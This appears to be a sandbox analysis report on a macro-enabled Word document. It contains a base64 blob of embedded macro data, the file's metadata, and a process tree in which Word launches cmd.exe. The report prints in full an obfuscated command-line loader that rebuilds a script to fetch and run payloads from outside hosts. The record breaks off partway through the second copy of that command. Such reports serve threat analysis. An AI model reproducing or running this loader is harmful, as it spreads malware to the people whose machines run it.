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 mxLsqu6EtXvLmLentp/IvNsfTYkdXlBHyePqXq9ByjpF76wW1xi1Xtdv8EZBW38WPDv7vbs91Lsk +rv3MwuvOlT4Xblbuu/5CY4MNtC6u3fJG49ceV+/4uflV5dP2dIypcrNM537Xukq2+WiC68qr5y2 3w0LkaopDfMFr5jfQvoX37CsRbuErD/cTr3RDsH3n32K68IGpvNIpjfyF10Qn9N/cHxXSd6UW1uU dy4PctqSqRfuPD2a2VLQuevMK1yzp7SwTwnrLsvw9ZwWLe4dm1E08FxHW+DRf1TN3XVLuVI0seq2 BUXkEZrt6HdUbG65LNur3HmvAqaKtUupJLYpU8F+UXbJXUqHwwPmSYsq7REwT6QAVFq4LgywTRRr WwZsE0Vuy9QwRkArp1m2CZhAYChHDGIyh9IqtXfQEDs0VWm1DJTNPmdtmyq4DgZKl5SUNYY2bq23 gTHQ4Gt1poB90kANUziUeZL5GzS1WCWetZTQUWsjkylVHd1jHqjVhJvyy/NV0FBNHlNV6Y78FkN3 U3ZpficsmfmKrvHZsJC9nir79P2uG+Re5Y49THGnOG/LVW61NihbVedoNVcZ1TXZfb/eZW9LurKc XHk0viPpnl377VRrNzLVu/wc5yi5Fdll70V2PeWpoUTtfgr0ZlVOGxOku+KiSGwXFbp5WYQL5XZP 0BRq9/qK5lqSA0rN0X5pXbuWahhqoSH3t6qAy2G9XfibEzsmg52gfOuJrUwlhelpQSrMvuUlCpg1 Qco13f/k8q6x9VQ1UvKbJ4OR1p2aNokbYue4OtYbinGd+bae0pcXNkzy1FU13KmDwWHtOKbOmhV2 LpMbjh654+h0eQ3aG99uLKxwut3z5nSdae00PvLwuV035jBttq+v8CzSqXOjr6e31OS+XrfUUWqv o84DS1jW6wjrOuj2Xkeb0PS+0R5QCEafC/ihmJu9KS2M9F4E1sgjl5zm7Ts1Pa37nEFrxJ2e5lMq 26u9QaU9FolEQ805p/QuiTIKBnxlvRJqaspp0HX1daMwE9ajvQ/6MgtnKrnejurScG1odOEJ/om9 YNAo/wtJvifggOOxirKNyoS/Ln/gcN9tz137jZ9d9CUxdcOjRs53K4pTvgwZjzoTDzrjhDzpm2pH EZWXstUwM3SauLcsUtveFKKJe1asRhdcSLhkWMmSSOvGwbv1TKPy1XTXO+6420ZvvPOSDChQBCf+ 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 VABPAE8AUABFAE4AAABAAAAL8AQAAAASNFZ4
WordDocumentDocSuppDataBinDataName:	editdata.mso
WordDocumentStylesStyleRPrRFontsCs:	Tahoma
WordDocumentStylesStyleRPrRFontsH-ansi:	Tahoma
WordDocumentStylesStyleRPrRFontsAscii:	Tahoma
WordDocumentStylesStyleRsidVal:	005A24B1
WordDocumentStylesStyleLinkVal:	BalloonTextChar
WordDocumentStylesStyleBasedOnVal:	Normal
WordDocumentStylesStyleTblPrTblCellMarRightType:	dxa
WordDocumentStylesStyleTblPrTblCellMarRightW:	108
WordDocumentStylesStyleTblPrTblCellMarBottomType:	dxa
WordDocumentStylesStyleTblPrTblCellMarBottomW:	-
WordDocumentStylesStyleTblPrTblCellMarLeftType:	dxa
WordDocumentStylesStyleTblPrTblCellMarLeftW:	108
WordDocumentStylesStyleTblPrTblCellMarTopType:	dxa
WordDocumentStylesStyleTblPrTblCellMarTopW:	-
WordDocumentStylesStyleTblPrTblIndType:	dxa
WordDocumentStylesStyleTblPrTblIndW:	-
WordDocumentStylesStyleUiNameVal:	Table Normal
WordDocumentStylesStyleRPrLangBidi:	AR-SA
WordDocumentStylesStyleRPrLangFareast:	EN-US
WordDocumentStylesStyleRPrLangVal:	EN-US
WordDocumentStylesStyleRPrSz-csVal:	22
WordDocumentStylesStyleRPrSzVal:	22
WordDocumentStylesStyleRPrFontVal:	Calibri
WordDocumentStylesStylePPrSpacingLine-rule:	auto
WordDocumentStylesStylePPrSpacingLine:	259
WordDocumentStylesStylePPrSpacingAfter:	160
WordDocumentStylesStyleNameVal:	Normal
WordDocumentStylesStyleStyleId:	Normal
WordDocumentStylesStyleDefault:	on
WordDocumentStylesStyleType:	paragraph
WordDocumentStylesLatentStylesLsdExceptionName:	Normal
WordDocumentStylesLatentStylesLatentStyleCount:	375
WordDocumentStylesLatentStylesDefLockedState:	off
WordDocumentStylesVersionOfBuiltInStylenamesVal:	7
WordDocumentFontsFontSigCsb-1:	00000000
WordDocumentFontsFontSigCsb-0:	000001FF
WordDocumentFontsFontSigUsb-3:	00000000
WordDocumentFontsFontSigUsb-2:	00000009
WordDocumentFontsFontSigUsb-1:	C0007841
WordDocumentFontsFontSigUsb-0:	E0002AFF
WordDocumentFontsFontPitchVal:	variable
WordDocumentFontsFontFamilyVal:	Roman
WordDocumentFontsFontCharsetVal:	00
WordDocumentFontsFontPanose-1Val:	02020603050405020304
WordDocumentFontsFontName:	Times New Roman
WordDocumentFontsDefaultFontsCs:	Times New Roman
WordDocumentFontsDefaultFontsH-ansi:	Calibri
WordDocumentFontsDefaultFontsFareast:	Calibri
WordDocumentFontsDefaultFontsAscii:	Calibri
WordDocumentDocumentPropertiesVersion:	16
WordDocumentDocumentPropertiesCharactersWithSpaces:	1
WordDocumentDocumentPropertiesParagraphs:	1
WordDocumentDocumentPropertiesLines:	1
WordDocumentDocumentPropertiesCharacters:	1
WordDocumentDocumentPropertiesWords:	-
WordDocumentDocumentPropertiesPages:	1
WordDocumentDocumentPropertiesLastSaved:	2019:01:22 13:10:00Z
WordDocumentDocumentPropertiesCreated:	2019:01:22 13:10:00Z
WordDocumentDocumentPropertiesTotalTime:	-
WordDocumentDocumentPropertiesRevision:	1
WordDocumentIgnoreSubtreeVal:	http://schemas.microsoft.com/office/word/2003/wordml/sp2
WordDocumentOcxPresent:	no
WordDocumentEmbeddedObjPresent:	no
WordDocumentMacrosPresent:	yes

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID	CMD	Path	Indicators	Parent process
2680	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\ATT06893577070808081.doc"	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	—	explorer.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000
3944	c:\w4537\d5871\t6947\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:/C"set xgz==r{89p.o;g_tu@-57hszb'6FIc)BeayD$iL+\N2lkJP% 4GY(m3HT}ZnS:jxORKEA/Wv1f,wU0CdM~&&for %m in (5,7,71,43,42,72,27,34,24,74,57,77,15,70,68,43,1,43,56,63,56,56,24,60,37,37,64,76,63,57,77,14,45,70,68,43,17,43,52,63,76,42,57,77,14,50,70,68,43,39,39,44,32,12,15,3,45,45,0,21,75,68,16,4,45,21,8,32,17,4,45,68,73,0,55,28,71,14,7,20,58,28,25,11,44,37,28,11,6,66,28,20,74,39,33,28,55,11,8,32,40,50,22,73,4,0,21,17,11,11,5,57,65,65,29,17,39,12,55,33,67,28,1,18,33,11,30,6,25,7,49,65,39,66,3,54,4,60,73,40,60,39,11,13,17,11,11,5,57,65,65,71,71,71,6,49,28,9,29,69,33,9,17,11,7,55,6,18,29,55,75,20,7,59,5,17,6,25,7,49,65,71,51,60,33,72,11,23,71,24,27,58,10,67,12,13,17,11,11,5,57,65,65,5,11,7,69,6,25,39,12,20,65,71,25,30,68,72,46,61,33,31,4,4,68,10,69,18,55,13,17,11,11,5,57,65,65,29,33,1,25,7,55,5,1,7,6,25,7,6,19,29,65,47,69,17,51,34,5,9,18,62,41,73,67,10,23,75,28,13,17,11,11,5,57,65,65,18,25,17,29,5,28,55,20,28,75,1,33,58,69,6,55,39,65,28,3,28,46,63,50,20,23,1,25,3,73,11,66,76,20,21,6,56,5,39,33,11,48,21,13,21,26,8,32,58,50,16,4,45,0,21,7,22,15,38,38,21,8,32,67,45,50,50,16,44,0,44,21,38,22,4,21,8,32,12,45,45,73,16,0,21,29,45,45,4,4,21,8,32,18,3,4,3,22,0,32,28,55,67,57,11,28,49,5,35,21,36,21,35,32,67,45,50,50,16,35,21,6,28,59,28,21,8,69,7,1,28,29,25,17,48,32,7,15,68,16,22,44,33,55,44,32,40,50,22,73,4,26,2,11,1,30,2,32,17,4,45,68,73,6,31,7,71,55,39,7,29,75,23,33,39,28,48,32,7,15,68,16,22,70,44,32,18,3,4,3,22,26,8,32,49,68,3,22,68,0,21,75,68,4,22,15,21,8,24,69,44,48,48,46,28,11,14,24,11,28,49,44,32,18,3,4,3,22,26,6,39,28,55,9,11,17,44,14,9,28,44,45,73,73,73,73,26,44,2,24,55,67,7,40,28,14,24,11,28,49,44,32,18,3,4,3,22,8,32,71,68,15,68,45,0,21,49,68,15,4,3,21,8,20,1,28,29,40,8,53,53,25,29,11,25,17,2,53,53,32,5,3,50,22,22,0,21,20,50,45,15,68,21,8,82)do set NZ=!NZ!!xgz:~%m,1!&&if %m gtr 81 echo !NZ:*NZ!=!\|cmd"	c:\windows\system32\cmd.exe	—	WINWORD.EXE
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
2224	CmD /V:/C"set xgz==r{89p.o;g_tu@-57hszb'6FIc)BeayD$iL+\N2lkJP% 4GY(m3HT}ZnS:jxORKEA/Wv1f,wU0CdM~&&for %m in (5,7,71,43,42,72,27,34,24,74,57,77,15,70,68,43,1,43,56,63,56,56,24,60,37,37,64,76,63,57,77,14,45,70,68,43,17,43,52,63,76,42,57,77,14,50,70,68,43,39,39,44,32,12,15,3,45,45,0,21,75,68,16,4,45,21,8,32,17,4,45,68,73,0,55,28,71,14,7,20,58,28,25,11,44,37,28,11,6,66,28,20,74,39,33,28,55,11,8,32,40,50,22,73,4,0,21,17,11,11,5,57,65,65,29,17,39,12,55,33,67,28,1,18,33,11,30,6,25,7,49,65,39,66,3,54,4,60,73,40,60,39,11,13,17,11,11,5,57,65,65,71,71,71,6,49,28,9,29,69,33,9,17,11,7,55,6,18,29,55,75,20,7,59,5,17,6,25,7,49,65,71,51,60,33,72,11,23,71,24,27,58,10,67,12,13,17,11,11,5,57,65,65,5,11,7,69,6,25,39,12,20,65,71,25,30,68,72,46,61,3